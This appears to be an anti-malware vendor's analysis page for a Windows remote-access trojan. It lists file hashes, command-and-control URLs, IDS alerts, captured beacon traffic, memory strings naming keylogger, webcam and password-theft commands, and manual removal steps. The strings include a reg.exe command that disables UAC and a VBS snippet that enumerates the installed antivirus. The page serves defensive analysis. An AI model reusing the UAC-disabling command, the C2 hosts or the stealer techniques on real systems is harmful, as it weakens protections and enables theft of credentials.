94a20be0aca341f670175ad7b30cdb70 c:\Documents and Settings\"%CurrentUserName%"\Application Data\Microsoft\HeciServer.exe
a531e1d6451b30723620c298fdf6698c c:\Documents and Settings\"%CurrentUserName%"\Application Data\Microsoft\winlogon.exe
94a20be0aca341f670175ad7b30cdb70 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\CRYPT.EXE
d57c0b186f317542fe21e13b415afd0e c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HIDDEN SIGHT.EXE
f4a9746343bff59289683b61ee2aaea5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\HSCB.EXE
8681a2f9790d32af1e04ae38bb6718c8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\OPENGL.EXE
97dd74c87a8c95010e03df713ba89e94 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TEST.EXE
925037fce4e40da2630be9ba1d0b5168 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TEST2.EXE
30be59a5ef02c6452e31c5772cf25dcc c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TEST3.EXE
d238aa515b128c52b27742ecfd1ce970 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WINUPDATE.EXE
52e851fba866c2714ad2c4c5cd8cd59b c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\WUPDATE.EXE

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: [ ZERO ]
Product Name: | Hidden Sight |
Product Version: 1.0.0.0
Legal Copyright: Copyright (c) [ZERO] 2012
Legal Trademarks: Crypters
Original Filename: _Stealth.exe
Internal Name: _Stealth.exe
File Version: 1.0.0.0
File Description: | Hidden Sight |
Comments: Hidden Sight is a PE protection tool which will help you protect your exe files from decompilation.
Language: Language Neutral

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 524311 524800 4.59881 6c20c6bf686768b6f134f5bd508171bc
.rdata 532480 55644 55808 3.38259 f979966509a93083729d23cdfd2a6f2d
.data 589824 107800 26624 1.52649 2eada62709ff2cb9506fbd72640c857c
.rsrc 700416 3697372 3697664 5.5059 997ae30925e33e7ab08099e9b0c471f6

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://tuttyfrutty.hol.es/root/Panel/gate.php 31.220.16.4
hxxp://gentle.eu5.org/root/HC/index.php?action=add&a=12&c=XP8&u=www.no-ip.com&l=&p= 5.9.106.214
hxxp://gentle.eu5.org/root/HC/index.php?action=add&a=4&c=XP8&u=-&l=Microsoft Windows XP Professional&p=FC62K-HM2DP-GP43D-DJMFR-2DC4G 5.9.106.214
joujounette974.ddns.net 108.59.13.41


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Trojan Generic - POST To gate.php with no referer
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System
ET TROJAN Fareit/Pony Downloader Checkin 2
ET TROJAN Pony Downloader HTTP Library MSIE 5 Win98
ET TROJAN Generic -POST To gate.php w/Extended ASCII Characters
ET TROJAN Win32/Sisron/BackDoor.Cybergate.1 Checkin

Traffic

POST /root/Panel/gate.php HTTP/1.0
Host: tuttyfrutty.hol.es
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 444
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

.?..<.=..J......t.7{....`M.PS....&.....\H.;_.ON&`......|....FO....a...1`.<...R3....p
....MJ...=.2..cO..Q %...U.CEu. &~.;..=I....D...Ql...E.Sx.t.9..^P....8............V$..0.^8'`..h...!...>....aC(9.?,.3}....pZ' wi.....Wk..&....._.#kF.,.-......G$.k.....$Q.G..Z...s....t.8K.-..a.......w8.j[<..3Y.....eG.qJ..~.y_....#..&...$E@`......Q......c~.....Zv..xl.L..~..
.P.T".Rm.k.cTo.jB7...HZ -..6...!zaS.M.4...a....9)Y.NC;VTE...xT..e6v.#v...z8E.. ].2-.K
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 01 Aug 2014 08:17:39 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hXXp://redirect.main-hosting.eu/cpu_exceeded.php?id=13&domain=tuttyfrutty.hol.es&master=0
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx</center&g
t;..</body>..</html>....



GET /root/HC/index.php?action=add&a=12&c=XP8&u=VVV.no-ip.com&l=&p= HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gentle.eu5.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 01 Aug 2014 08:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.4.17
Content-Length: 0
Keep-Alive: timeout=1, max=10000
Connection: Keep-Alive
Content-Type: text/html
HTTP/1.1 200 OK..Date: Fri, 01 Aug 2014 08:17:38 GMT..Server: Apache..
X-Powered-By: PHP/5.4.17..Content-Length: 0..Keep-Alive: timeout=1, ma
x=10000..Connection: Keep-Alive..Content-Type: text/html..



POST /root/Panel/gate.php HTTP/1.0
Host: tuttyfrutty.hol.es
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 444
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

.?..<.=..J......t.7{....`M.PS....&.....\H.;_.ON&`......|....FO....a...1`.<...R3....p
....MJ...=.2..cO..Q %...U.CEu. &~.;..=I....D...Ql...E.Sx.t.9..^P....8............V$..0.^8'`..h...!...>....aC(9.?,.3}....pZ' wi.....Wk..&....._.#kF.,.-......G$.k.....$Q.G..Z...s....t.8K.-..a.......w8.j[<..3Y.....eG.qJ..~.y_....#..&...$E@`......Q......c~.....Zv..xl.L..~..
.P.T".Rm.k.cTo.jB7...HZ -..6...!zaS.M.4...a....9)Y.NC;VTE...xT..e6v.#v...z8E.. ].2-.K
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 01 Aug 2014 08:17:34 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hXXp://redirect.main-hosting.eu/cpu_exceeded.php?id=13&domain=tuttyfrutty.hol.es&master=0
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx</center&g
t;..</body>..</html>....



POST /root/Panel/gate.php HTTP/1.0
Host: tuttyfrutty.hol.es
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 444
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

.?..<.=..J......t.7{....`M.PS....&.....\H.;_.ON&`......|....FO....a...1`.<...R3....p
....MJ...=.2..cO..Q %...U.CEu. &~.;..=I....D...Ql...E.Sx.t.9..^P....8............V$..0.^8'`..h...!...>....aC(9.?,.3}....pZ' wi.....Wk..&....._.#kF.,.-......G$.k.....$Q.G..Z...s....t.8K.-..a.......w8.j[<..3Y.....eG.qJ..~.y_....#..&...$E@`......Q......c~.....Zv..xl.L..~..
.P.T".Rm.k.cTo.jB7...HZ -..6...!zaS.M.4...a....9)Y.NC;VTE...xT..e6v.#v...z8E.. ].2-.K
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 01 Aug 2014 08:17:44 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hXXp://redirect.main-hosting.eu/cpu_exceeded.php?id=13&domain=tuttyfrutty.hol.es&master=0
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx</center&g
t;..</body>..</html>....



GET /root/HC/index.php?action=add&a=4&c=XP8&u=-&l=Microsoft Windows XP Professional&p=FC62K-HM2DP-GP43D-DJMFR-2DC4G HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gentle.eu5.org
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Fri, 01 Aug 2014 08:17:38 GMT
Server: Apache
X-Powered-By: PHP/5.4.17
Content-Length: 0
Keep-Alive: timeout=1, max=10000
Connection: Keep-Alive
Content-Type: text/html
HTTP/1.1 200 OK..Date: Fri, 01 Aug 2014 08:17:38 GMT..Server: Apache..
X-Powered-By: PHP/5.4.17..Content-Length: 0..Keep-Alive: timeout=1, ma
x=10000..Connection: Keep-Alive..Content-Type: text/html..



POST /root/Panel/gate.php HTTP/1.0
Host: tuttyfrutty.hol.es
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: 444
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)

.?..<.=..J......t.7{....`M.PS....&.....\H.;_.ON&`......|....FO....a...1`.<...R3....p
....MJ...=.2..cO..Q %...U.CEu. &~.;..=I....D...Ql...E.Sx.t.9..^P....8............V$..0.^8'`..h...!...>....aC(9.?,.3}....pZ' wi.....Wk..&....._.#kF.,.-......G$.k.....$Q.G..Z...s....t.8K.-..a.......w8.j[<..3Y.....eG.qJ..~.y_....#..&...$E@`......Q......c~.....Zv..xl.L..~..
.P.T".Rm.k.cTo.jB7...HZ -..6...!zaS.M.4...a....9)Y.NC;VTE...xT..e6v.#v...z8E.. ].2-.K
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Fri, 01 Aug 2014 08:17:50 GMT
Content-Type: text/html
Content-Length: 154
Connection: close
Location: hXXp://redirect.main-hosting.eu/cpu_exceeded.php?id=13&domain=tuttyfrutty.hol.es&master=0
<html>..<head><title>302 Found</title></hea
d>..<body bgcolor="white">..<center><h1>302 Found
</h1></center>..<hr><center>nginx</center&g
t;..</body>..</html>....

The Trojan connects to the servers at the folowing location(s):

svchost.exe_1368:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512

svchost.exe_1368_rwx_00080000_00001000:

KERNEL32.DLL

svchost.exe_1368_rwx_001C0000_00001000:

KERNEL32.DLL

svchost.exe_1368_rwx_00200000_00001000:

KERNEL32.DLL

svchost.exe_1368_rwx_00240000_00001000:

KERNEL32.DLL

svchost.exe_1368_rwx_00280000_00001000:

KERNEL32.DLL

svchost.exe_1368_rwx_002C0000_00001000:

KERNEL32.DLL

svchost.exe_1368_rwx_004E0000_00001000:

advapi32.dll

svchost.exe_1368_rwx_00610000_00001000:

RegOpenKeyA

svchost.exe_1368_rwx_00620000_00001000:

advapi32.dll

svchost.exe_1368_rwx_00650000_00001000:

AVICAP32.DLL

svchost.exe_1368_rwx_00790000_00001000:

AVICAP32.DLL

svchost.exe_1368_rwx_007C0000_00001000:

gdi32.dll

svchost.exe_1368_rwx_00800000_00001000:

gdi32.dll

svchost.exe_1368_rwx_00830000_00001000:

gdiplus.dll

svchost.exe_1368_rwx_00870000_00001000:

gdiplus.dll

svchost.exe_1368_rwx_008B0000_00001000:

mpr.dll

svchost.exe_1368_rwx_00E50000_00001000:

mpr.dll

svchost.exe_1368_rwx_00E80000_00001000:

msacm32.dll

svchost.exe_1368_rwx_00FD0000_00001000:

msacm32.dll

svchost.exe_1368_rwx_01310000_00001000:

ntdll.dll

svchost.exe_1368_rwx_01450000_00001000:

ntdll.dll

svchost.exe_1368_rwx_01480000_00001000:

ole32.dll

svchost.exe_1368_rwx_015C0000_00001000:

ole32.dll

svchost.exe_1368_rwx_015F0000_00001000:

oleaut32.dll

svchost.exe_1368_rwx_01730000_00001000:

oleaut32.dll

svchost.exe_1368_rwx_01760000_00001000:

powrprof.dll

svchost.exe_1368_rwx_018A0000_00001000:

powrprof.dll

svchost.exe_1368_rwx_018D0000_00001000:

shell32.dll

svchost.exe_1368_rwx_01A00000_00001000:

ShellExecuteA

svchost.exe_1368_rwx_01A10000_00001000:

shell32.dll

svchost.exe_1368_rwx_01A40000_00001000:

user32.dll

svchost.exe_1368_rwx_01B80000_00001000:

user32.dll

svchost.exe_1368_rwx_01BB0000_00001000:

wininet.dll

svchost.exe_1368_rwx_01CE0000_00001000:

FtpOpenFileA

svchost.exe_1368_rwx_01CF0000_00001000:

wininet.dll

svchost.exe_1368_rwx_01D20000_00001000:

winmm.dll

svchost.exe_1368_rwx_01E60000_00001000:

winmm.dll

svchost.exe_1368_rwx_01E90000_00001000:

wsock32.dll

svchost.exe_1368_rwx_01FE0000_00001000:

wsock32.dll

svchost.exe_1368_rwx_10410000_00065000:

`.rsrc
kernel32.dll
Portions Copyright (c) 1999,2003 Avenger by NhT
SHFileOperationA
shell32.dll
URLDownloadToFileA
urlmon.dll
ShellExecuteA
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
GetWindowsDirectoryA
SOFTWARE\Microsoft\Windows\CurrentVersion
http\shell\open\command
\Internet Explorer\iexplore.exe
####@####
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
Portugal
Turkey
Windows 3.1
Windows 95 (Release 2)
Windows 95
Windows 98 SE
Windows 98
Windows ME
Windows 7
Windows Vista
%s %s
Windows XP Professional x64
Windows XP Home
Windows XP Professional
Windows 2000 Professional
Windows NT %d.%d
Windows 2008
%s %s Server
Windows 2003 Server Datacenter
Windows 2003 Server Enterprise
Windows 2003 Server Web Edition
Windows 2003 Server
Windows Home Server
Windows 2003 Server (Release 2)
Windows 2000 Server Datacenter
Windows 2000 Server Enterprise
Windows 2000 Server Web Edition
Windows 2000 Server
Windows NT 4.0 Server Datacenter
Windows NT 4.0 Server Enterprise
Windows NT 4.0 Server Web Edition
Windows NT 4.0 Server
Unknown Platform ID (%d)
%d.%d
%s (Build: %d
- Service Pack: %s
KERNEL32.DLL
teste.vbs
teste.txt
Set objSecurityCenter = GetObject("winmgmts:\\.\root\SecurityCenter")
Set colFirewall = objSecurityCenter.ExecQuery("Select * From FirewallProduct",,48)
Set colAntiVirus = objSecurityCenter.ExecQuery("Select * From AntiVirusProduct",,48)
Set objFileSystem = CreateObject("Scripting.fileSystemObject")
Set objFile = objFileSystem.CreateTextFile("
Info = Info & "F" & CountFw & ") " & objFirewall.displayName & " v" & objFirewall.versionNumber & Enter
Info = Info & "A" & CountAV & ") " & objAntiVirus.displayName & " v" & objAntiVirus.versionNumber & Enter
objFile.WriteLine(Info)
objFile.Close
cscript.exe
AVICAP32.dll
tFtpAccess
v1.07.5
BuildImportTable: can't load library:
BuildImportTable: ReallocMemory failed
BuildImportTable: GetProcAddress failed
BTMemoryLoadLibary: BuildImportTable failed
BTMemoryGetProcAddress: no export table found
BTMemoryGetProcAddress: DLL doesn't export anything
BTMemoryGetProcAddress: exported symbol not found
SetupApi.dll
SetupDiOpenClassRegKey
SetupDiOpenClassRegKeyExA
SetupDiOpenClassRegKeyExW
SetupDiCreateDeviceInterfaceRegKeyA
SetupDiCreateDeviceInterfaceRegKeyW
SetupDiOpenDeviceInterfaceRegKey
SetupDiDeleteDeviceInterfaceRegKey
SetupDiCreateDevRegKeyA
SetupDiCreateDevRegKeyW
SetupDiOpenDevRegKey
SetupDiDeleteDevRegKey
CM_DEVCAP_LOCKSUPPORTED
CM_DEVCAP_EJECTSUPPORTED
PDCAP_D0_SUPPORTED
PDCAP_D1_SUPPORTED
PDCAP_D2_SUPPORTED
PDCAP_D3_SUPPORTED
PDCAP_WAKE_FROM_D0_SUPPORTED
PDCAP_WAKE_FROM_D1_SUPPORTED
PDCAP_WAKE_FROM_D2_SUPPORTED
PDCAP_WAKE_FROM_D3_SUPPORTED
PDCAP_WARM_EJECT_SUPPORTED
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
127.0.0.1
iphlpapi.dll
AllocateAndGetTcpExTableFromStack
AllocateAndGetUdpExTableFromStack
SetTcpEntry
GetExtendedTcpTable
GetExtendedUdpTable
Mozilla3_5Password
GetChromePass
StartHttpProxy
1.2.3
keyboardkey
webcaminactive
webcamgetbuffer
webcam
enviarexecnormal
enviarexechidden
openweb
openwebpage
openwebhidden
downexec
sendftp
keylogger
keyloggergetlog
keyloggereraselog
keyloggerativar
keyloggerdesativar
renamekey
windowsfechar
windowsmax
windowsmin
windowsmostrar
windowsocultar
windowsmintodas
windowscaption
listarportas
listarportasdns
finalizarprocessoportas
webcamsettings
chatmsg
getpassword
updateservidorweb
keyloggersearch
urlredirect
urlredirecttrue
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
PSAPI.dll
\config\SteamAppData.vdf
AutoLoginUser
/ClientRegistry.Blob
\ClientRegistry.blob
\steam.dll
%SYS%
ÞSKTOP%
Uhm%D
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
FirstExecution
chatmsg|
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
listarjanelas|windowsfechar|
listarjanelas|windowsmax|
listarjanelas|windowsmin|
listarjanelas|windowsmostrar|
listarjanelas|windowsocultar|
listarjanelas|windowsmintodas|
listarjanelas|windowscaption|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
listarportas|listadeportaspronta|
listarportas|finalizarconexao|
listarportas|finalizarprocessoportas|Y|
listarportas|finalizarprocessoportas|N|
registro|renamekey|
keylogger|keylogger|keyloggerativar|
keylogger|keylogger|keyloggerdesativar|
keylogger|keyloggergetlog|
keylogger|keylogger|keyloggervazio|
keyloggersearchok|
webcam|webcaminactive|
webcam|webcamactive|
SOFTWARE\Mozilla\Mozilla Firefox
getfirefox
getielogin
getiepass
getieweb
getchrome
getpassword|getpasswordlist|
getpassword|getpassworderror|
duac.bat
%windir%\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe duac.bat
C:\Windows\System32\drivers\etc\hosts
Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\
Software\Microsoft\Windows\CurrentVersion\RunServicesOnce\
Software\Microsoft\Windows\CurrentVersion\RunServices\
Software\Microsoft\Windows\CurrentVersion\RunOnce\
Software\Microsoft\Windows\CurrentVersion\Run\
temp.vbs
ntdll.dll
log.dat
SQLite3.dll
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
KWindows
RegExport
UrlMon
UnitExecutarComandos
uftp
.UnitBytesSize
UnitListarPortasAtivas
UnitWebcam
UnitKeylogger
WinExec
SetNamedPipeHandleState
GetProcessHeap
CreatePipe
RegQueryInfoKeyA
RegOpenKeyExA
RegOpenKeyA
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
RegCreateKeyA
RegCloseKey
GdiplusShutdown
keybd_event
MsgWaitForMultipleObjects
MapVirtualKeyA
GetKeyboardState
GetKeyboardLayoutNameA
GetKeyState
GetAsyncKeyState
ExitWindowsEx
EnumWindows
FtpGetFileSize
FtpSetCurrentDirectoryA
FtpOpenFileA
%( % & % % % ]
.idata
.reloc
P.rsrc
hbS%S
advapi32.dll
AVICAP32.DLL
gdi32.dll
gdiplus.dll
mpr.dll
msacm32.dll
ole32.dll
oleaut32.dll
powrprof.dll
user32.dll
wininet.dll
winmm.dll
wsock32.dll

HIDDEN SIGHT.EXE_1944_rwx_0052B000_00001000:

v4.0.30319

HIDDEN SIGHT.EXE_1944_rwx_00547000_00001000:

$cafe90b6-600b-4b43-8793-7744248ac619
cHidden Sight is a PE protection tool which will help you protect your exe files from decompilation.
.NETFramework,Version=v4.0
.NET Framework 4
1.0.0.0
Confuser v1.9.0.0
ntdll.dll

OPENGL.EXE_1300_rwx_009BA000_00002000:

.eOyXPRV

OPENGL.EXE_1300_rwx_675A6000_00003000:

.Qg<-Qg
*Rg`.Rg|)RgL Rg


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    TEST3.EXE:1688
    WUPDATE.EXE:960
    TEST.EXE:640
    TEST2.EXE:1636
    WINUPDATE.EXE:560
    WINUPDATE.EXE:1984
    %original file name%.exe:1504
    OPENGL.EXE:2008
    CRYPT.EXE:1552
    HSCB.EXE:952

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    %Documents and Settings%\%current user%\Local Settings\Temp\TEST2.EXE (15801 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\OPENGL.EXE (13 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\CRYPT.EXE (5442 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\HSCB.EXE (7386 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WINUPDATE.EXE (186 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\WUPDATE.EXE (83 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\TEST.EXE (15021 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\winlogon.exe (7547 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
    %Documents and Settings%\%current user%\Application Data\Microsoft\HeciServer.exe (7433 bytes)
    %Documents and Settings%\%current user%\Local Settings\Temp\HIDDEN SIGHT.EXE (7386 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Adobe Flash Player" = "%AppData%\Microsoft\winlogon.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Adobe Reader" = "%AppData%\Microsoft\winlogon.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "Microsoft(R) Delayed Launcher" = "%AppData%\Microsoft\HeciServer.exe"

  5. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "%AppData%\Microsoft\winlogon.exe,explorer.exe"

    [HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "%AppData%\Microsoft\HeciServer.exe,explorer.exe"

  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2026 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now